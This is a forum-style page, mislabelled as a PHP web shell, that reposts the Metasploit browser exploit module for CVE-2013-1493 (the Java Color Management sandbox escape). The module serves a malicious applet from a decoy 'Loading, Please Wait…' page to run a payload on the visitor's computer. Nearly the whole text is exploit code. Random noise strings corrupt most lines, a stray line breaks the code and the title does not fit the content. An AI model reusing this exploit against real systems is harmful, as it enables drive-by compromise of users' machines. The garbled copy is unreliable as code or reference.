STUNSHELL PHP Web Shell远程执行代码

admin

##
1 i7 W( ]3 j. m. ?. d5 ^2 \7 M
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
: }# n% N, j: T9 g* {0 ~# web site for more information on licensing and terms of use.
# http://metasploit.com/
) A0 d+ s3 \6 X: P##
( F: t; Q, Z  U- ^/ _" Jrequire ‘msf/core’
4 [4 y# M( w- Z! d! G4 zrequire ‘rex’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
' q0 r$ G  ^( Q# x: G  B, Sinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
* z1 Y- O% q& Q0 L" O) wautopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
; G: E  u; T8 j‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
! H; M$ F' A# m8 L( l0 t1 m3 s/ QThis module abuses the Color Management classes from a Java Applet to run
9 I! o! Q3 G& A# S# c/ earbitrary Java code outside of the sandbox as exploited in the wild in February
* e/ T5 Y# {7 l6 d1 Hand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
; h: ?; l  |3 j( v8 i5 J/ jsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
, S% }) K, q1 j3 ]6 swarning in order to run the malicious applet.
5 q4 l* `& L' v  l& X3 t},
' @, U, ?) ~9 i$ e$ a4 @0 P4 L‘License’ => MSF_LICENSE,
0 A6 L2 B/ D) v  @‘Author’ =>
7 P* H' J1 A' X'Unknown', # Vulnerability discovery and Exploit
' s) v) F' {* K5 {'juan vazquez' # Metasploit module (just ported the published exploit)
; `! ~$ m4 u8 v2 f+ y4 x" `],
& ]9 q/ U+ M: F‘References’ =>
[
, }/ |$ X$ E- G$ ~* B6 ][ 'CVE', '2013-1493' ],
( t4 A2 i. j* t) g3 c8 b4 N; u[ 'OSVDB', '90737' ],
# Y) E1 L; L4 q$ o8 F; o[ 'BID', '58238' ],
1 A  d$ }1 J6 b% q$ M) ^2 q4 l; Q[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
+ l( K  ^; I$ I0 @1 [],
5 O9 r: Q( e+ g; Q‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
& P3 z# l  a8 ?/ t) S‘Targets’ =>
9 `  Q& N( A$ p  {0 I6 ?[
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
# c* G7 p! n& K2 h3 F; I; P1 l) W: M}
! a' C6 c! b" x# n4 D6 [],
  l: ]' G$ b! Z# R1 n- n  g& N[ 'Windows x86 (Native Payload)',
5 C. o6 i, q" C, N{
'Platform' => 'win',
$ ?" t. [+ T& Z* }* ~0 b'Arch' => ARCH_X86
. d, A! C' d% P" P5 f* Y}
]
2 Y  z& o0 v0 l* T],
- z% I% m0 q- p/ e# ^1 x) Y# z‘‘DisclosureDate’ => ‘Mar 01 2013′
2 |, f3 G, I# T; Y) t))
: _2 U/ A: ^& `1 send
  @( k2 ?- j# E* Odef setup
% M/ U6 {! B9 ]8 s- ^+ Upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
" y( `( f; V5 w: b! fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
3 O5 U: _8 G# Q. \2 z; @@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
  F. a, ]" c0 E/ U2 m, ]; @path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
: R: P% ]- {" J@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
super
end
0 E4 c. K0 G  m5 |+ Y1 l3 Ydef on_request_uri(cli, request)
2 `& E+ ?& ~  v1 Bprint_status(“handling request for #{request.uri}”)
case request.uri
when /\.jar$/i
% n8 m" N; O, B+ E0 a0 Rjar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
8 t5 c6 x# G9 M1 hjar.add_file(“Leak.class”, @leak_class)
! T; z% \7 R) l* X# L5 gjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
* C1 _* w' Z6 ~, R' P; A* Cmetasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
; F2 h: R+ }1 Zjar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
/ S2 n/ S" [3 A2 sentry.name.gsub!(“Payload”, payload_str)
" l) x8 i/ J8 Centry.data = entry.data.gsub(“metasploit”, metasploit_str)
' [* v5 {  M) l( Wentry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
- ^( f( d6 W/ z* Qsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
9 X9 `' r! k. M+ i$ T) x4 Jpayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
* m9 U3 q3 Z  A5 Esend_not_found(cli)
return
# w- q( r- m- N, O+ d! k2 fend
+ H+ ^. R4 E  fsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
1 n# c, X/ f8 v& rsend_redirect(cli, get_resource() + ‘/’, ”)
end
' w+ B4 j8 H, I0 h5 @end
( I$ Y6 i3 |6 [' x& cdef generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
) m$ a; w5 |" F' d8 zhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
8 B# L) {3 F- ahtml += %Q|</applet></body></html>|
) S) i0 R# W0 R+ J  Yreturn html
4 h. F, g) k0 E8 U/ v) J  d, S+ Xend
end
end
, C8 A" _9 D% g/ y( J